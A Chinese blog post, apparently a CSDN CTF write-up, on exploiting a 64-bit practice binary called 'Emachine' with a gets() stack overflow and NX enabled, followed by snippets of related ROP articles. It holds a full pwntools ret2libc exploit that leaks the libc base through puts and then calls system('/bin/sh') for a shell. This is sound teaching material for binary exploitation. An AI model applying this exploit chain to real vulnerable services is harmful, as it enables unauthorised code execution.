暑期pwn! pwn! pang!(四) 64位ROP绕过 Emachine

最新推荐文章于 2025-01-09 13:11:33 发布
最新推荐文章于 2025-01-09 13:11:33 发布
阅读量583 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43342413/article/details/96475602
本文通过一个具体的64位程序案例,详细解析了如何利用ROP技术绕过栈不可执行保护,找到并利用漏洞。从获取libc基址到构造payload实现getshell,深入浅出地介绍了关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先看看保护
在这里插入图片描述

是个64位的,开了栈不可执行保护,先玩玩这个程序
在这里插入图片描述好了,到了开IDA的时间了,咱找到漏洞

int encrypt()
{
size_t v0; // rbx
char s[48]; // [rsp+0h] [rbp-50h]
__int16 v3; // [rsp+30h] [rbp-20h]
memset(s, 0, sizeof(s));
v3 = 0;
puts(“Input your Plaintext to be encrypted”);
gets((__int64)s);
while ( 1 )
{
v0 = (unsigned int)x;
if ( v0 >= strlen(s) )
break;
if ( s[x] <= 96 || s[x] > 122 )
{
if ( s[x] <= 64 || s[x] > 90 )
{
if ( s[x] > 47 && s[x] <= 57 )
s[x] ^= 0xFu;
}
else
{
s[x] ^= 0xEu;
}
}
else
{
s[x] ^= 0xDu;
}
++x;
}
puts(“Ciphertext”);
return puts(s);
}

先上exp

from pwn import *
#context.log_level='debug'
p=process('./Emachine')
elf=ELF('Emachine')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_plt=elf.plt['puts']
start_main=elf.got['__libc_start_main']
main=elf.symbols['main']


p.recv()
p.sendline("1")
#因为gets()在encrypt里面,所以我们发"1"过去
pld1='a'*0x50+'b'*8+p64(0x400c83)+p64(start_main)+p64(puts_plt)+p64(main)
'''64位程序传参,是先把参数传到寄存器里,第一个是rdi,所以我们得找到rdi的地址,然后是我们要传的参数,
然后是调用该参数的函数和返回地址。这里我们将返回地址覆盖为puts函数,将puts的返回地址设为main的
地址,我们是要泄露出libc_start_main的地址,所以把它当成参数传入,这样就能打印出来。'''

p.recv()
#先receive收到的消息,再发送,有助于我们后面的接收,其实就是receive掉那句Input your Plaintext...
p.sendline(pld1)

p.recvuntil('\n')
p.recvuntil('\n')
start_main=u64(p.recvuntil('\n',drop=True).ljust(8,'\0'))
#这儿就是得到libc_start_main的地址啦,后面我们详谈

libcbase=start_main-libc.symbols['__libc_start_main']
#得到libc_start_main的地址,减去得到的偏移,得到libc基址
p.recv()
#我们回到了main函数里面,主菜单又会出来一次,先recv()掉,看着比较舒服
p.sendline("1")   #到encrypt()里面,再进行一次泄露
pld2='a'*0x50+'b'*8+p64(0x400c83)+p64(libcbase+int(*libc.search("/bin/sh")))
+p64(libcbase+libc.symbols['system'])+p64(0xdeadbeef)
#传参"/bin/sh",调用函数,返回地址

p.sendline(pld2)
p.interactive()
#getshell

有几个点,咱来梳理一下:

  • 我们是用本地默认的libc,就算这个版本我们知道,但是libc开了pie,我们要获得system和/bin/sh的地址,还是得知道基址,再加上偏移,所以咱们得先算libc基址,做来做去还是这个思路。
  • 64位程序传参不太理所当然,当参数比七个少时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9,当参数多于七时, 前 6六个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。所以就像这个题目我们要传一个参数时,首先要找到rdi的地址
    ROPgadget --binary Emachine

在这里插入图片描述

  • 在收到libc_start_main地址的时候,也有一些细节。我们把debug模式打开
    在这里插入图片描述

0a是\n,我们要的地址在第二个0a和第三个0a之间,用python写上这个控制条件就是了。

Tom Li
关注
[网络安全自学篇] 五十五.Windows系统安全之构建ROP绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
PWN基础-ROP技术-ret2syscall-64程序栈溢出利用
最新发布
Welcome To Myon'Blog !
05-08 439
后面传两个参数就可以了,分开写,一起写都可以的,这里就不做过多演示了。前置 ret2syscall 的基础我们就不做过多讲解了。execve 系统调用号是 59,也就是 0x3b。ida 看一下 main 函数,存在明显的栈溢出。看到有两个连一起的,当然我们也可以一个一个地传参。而 64 系统调用最后是执行 syscall。32 系统调用最后是执行 int x080。我们这里只用到前三个就可以了,以及 rax。这里看到的这个不对,因为后面没有 ret。正确的应该是 0x45BAC5。
64ROP(level5)
weixin_44642009的博客
04-06 1627
64ROP 开始接触的ROP都是针对于32,和64的比起来,主要是编址以及函数传参的方式不一样,32的传参是直接将其压入栈中,我们便可以通过覆盖返回地址的方法,对函数的跳转进行控制而达到我们的目的,而64的传参首先是使用六个寄存器,其次更多的参数压入栈中,其参数存放寄存器的顺序依次是rdirdirdi,rsirsirsi,rdxrdxrdx,rcxrcxrcx,r8dr8dr8d,r9d...
栈溢出基本ROP绕过ASLR和NX保护
ditto的博客
12-28 3859
菜鸡刚学rop,总结下,算是对蒸米大佬这篇文章最后一个样例的一点解释说明。 笔记中的程序源代码来自 蒸米大佬的x86一步一步学rop http://www.vuln.cn/6645 计算溢出点的置的脚本可以在大佬的github上下载(其实从IDA上也可以计算出来溢出点) https://github.com/zhengmin1989/ROP_STEP_BY_STEP 预备知识: 了解动态链接中P...
利用ROP绕过DEP(Defeating DEP with ROP)调试笔记
weixin_33947521的博客
03-08 900
Debug_Orz · 2014/11/05 10:190x00 背景本文根据参考文献《Defeating DEP with ROP》,调试vulserver,研究ROP (Return Oriented Programming)基本利用过程,并利用ROP绕过DEP (Data Execution Prevention),执行代码。 0x00 ROP概述 缓冲区溢出的目的是为了控制EIP,从而执行...
pwn3-绕过防御-ROP(1)
qq_73667990的博客
06-08 913
*ROP:**全程Return Oriented Programming(面向返回的编程),在栈溢出基础上,利用程序中已有的小片段(gadgets),改变寄存器或变量的值,从而控制程序执行流程,从而绕过NX防御,常见有ret2text,ret2syscall,ret2libc(最常用)…**gadgets:**以ret结尾的指令序列,通过这些序列可以修改某些地址的内容。ROP攻击满足的条件:1.存在溢出,且可以控制返回地址2.满足条件的gadgets。
二、pwn - 零基础ROP之PIE保护绕过-碰撞
键盘的起始页
04-18 643
本文唯一区别在于,我们不利用vulnerable_function打印的地址,无法定pie base地址,直接随机碰撞(爆破)~ 有一定比例成功的可能,贴近实战!但是呢,内存溢出后覆盖PC,要么修改2、4、6、8...,无法修改3,又因为arm是小端模式,例如0x6b25741, 在内存中排列为0x41 0x57 0x6b...所以0x70d 是低地址,前面存在1 未知的数值,在1-F (16进制)之间,可能是0x170d、也可能是0x270d、0x370d...0xf70d。
Google Olympic Doodle Score Pwn!-crx插件
04-05
语言:English (United States) 奥林匹克运动会的Google涂鸦正在流行。 但是,并非所有人都能在漂流中创造出那些破纪录的时间,或在超高的航行中… 奥林匹克运动会的Google涂鸦正在流行。 但是并不是每个人都能在漂流...
Google奥运涂鸦得分榜!「Google Olympic Doodle Score Pwn!」-crx插件
03-13
奥运谷歌涂鸦流行。 但是,不是每个人都可以在漂流或超级高... 奥林匹克运动会的Google涂鸦正在流行。 但是,并非所有人都能在漂流中创造出那些破纪录的时间,或者在篮球比赛中创造出那些超高的得分!...
64程序rop链构造|攻防世界pwn进阶区 pwn-100
Kni9hT's Blog
03-16 4248
文章目录前言利用思路0x01.ida调试发现sub_40063D函数可以溢出0x02.cyclic计算溢出需要填充72字节0x03.checksec看一下保护0x04.利用思路:0x05.可以用vmmap查找binary文件地址0x06.用 `ROPgadget --binary pwn100 --only "pop|ret" | grep rdi`命令寻找ROP0x07.32程序和64程序...
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 454
CTF PWN [XMAN]level2(x64) 题目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问题,buf申请空间为0x80字节,然而可以读...
关于pwn64amd构造payload时的堆栈平衡问题以及3264构造payload的区别与注意事项
hu_c_t_f的博客
07-24 4020
pwn入门,栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32】和arm64【下面称64】的可执行程序【题目附件】。而3264同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。本人也是入门pwn的小白,写的不对的地方还请师傅们指出。栈堆平衡32中,没有堆栈平衡一说,而64中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。
一步一步学ROP之linux_x64
weixin_34204057的博客
11-07 413
一步一步学ROP之linux_x64篇 一、序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86的ROP攻击:《一步一步学ROP之linux_x86篇》,在这次的教程中我们会带来上...
18.9.20 Jarvis OJ PWN----[XMAN]level3(x64)
qq_42192672的博客
09-20 502
解压之后有两个文件,其中一个是lib,checksec后发现没有栈保护,wo,好想知道该怎么做了 拖进IDA看一下哪里可以溢出 read函数可以溢出 然后根据偏移量把system函数和/bin/sh在内存的置提取出来 同样采取rop代码,注意64的传参数顺序哦 上脚本 #代码主体 write_got=bin.got['write'] write_plt=bin.plt['w...
夏令营第二周pwn的level-x64题总结
MIGENGKING的博客
07-26 408
今天我来总结一下pwn的level2_x64: 我们直接把题目放进ubuntu虚拟机查看题目: 发现题目的arch模块是64的;NX保护模式开启,所无法构建shellcode拿到shell/ 接下把文件放进IDAx64分析: ...
Pwn question_4_2_x64 ROP编程 以及 ropper初使用
MrTreebook的博客
04-23 1292
ROP编程
2019全国大学生信息安全大赛线下初体验 --体验黑客的儿童节
Migraine‘s Blog
06-03 2461
目录楔子Day0Day1WriteUpDay2 楔子 20岁的第一次儿童节,万万没想到,自己竟然真的回到了十年前没有智能机与互联网的时代。 –2019.6.1 Day0 这场比赛的线上赛,大概是在月份吧,也就这个学期的起始。但是转眼一瞬,线下选拔赛便是两个月之后,就快要抓不住学期的尾巴。 几个月之后便是大三的学生了,将要考虑未来的方向。这学期花了很多时间来做自己的事情,学习自己想学的东西,课...
PWN入门(5)32程序与64程序和构造ROP
Ba1_Ma0的博客
09-12 2172
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
ROP 绕过数据执行保护(Bypass DEP)
m0_74034646的博客
01-09 1049
ROP 绕过数据执行保护(Bypass DEP)
pwn栈溢出 64
02-19
面对启用NX bit保护机制以及开启ASLR的情况下,ROP成为一种有效的绕过策略。该技巧涉及寻找并链接一系列存在于合法二进制文件内的短小指令序列(gadgets),最终构建起能够执行恶意操作的代码片段[^3]。 #### 利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值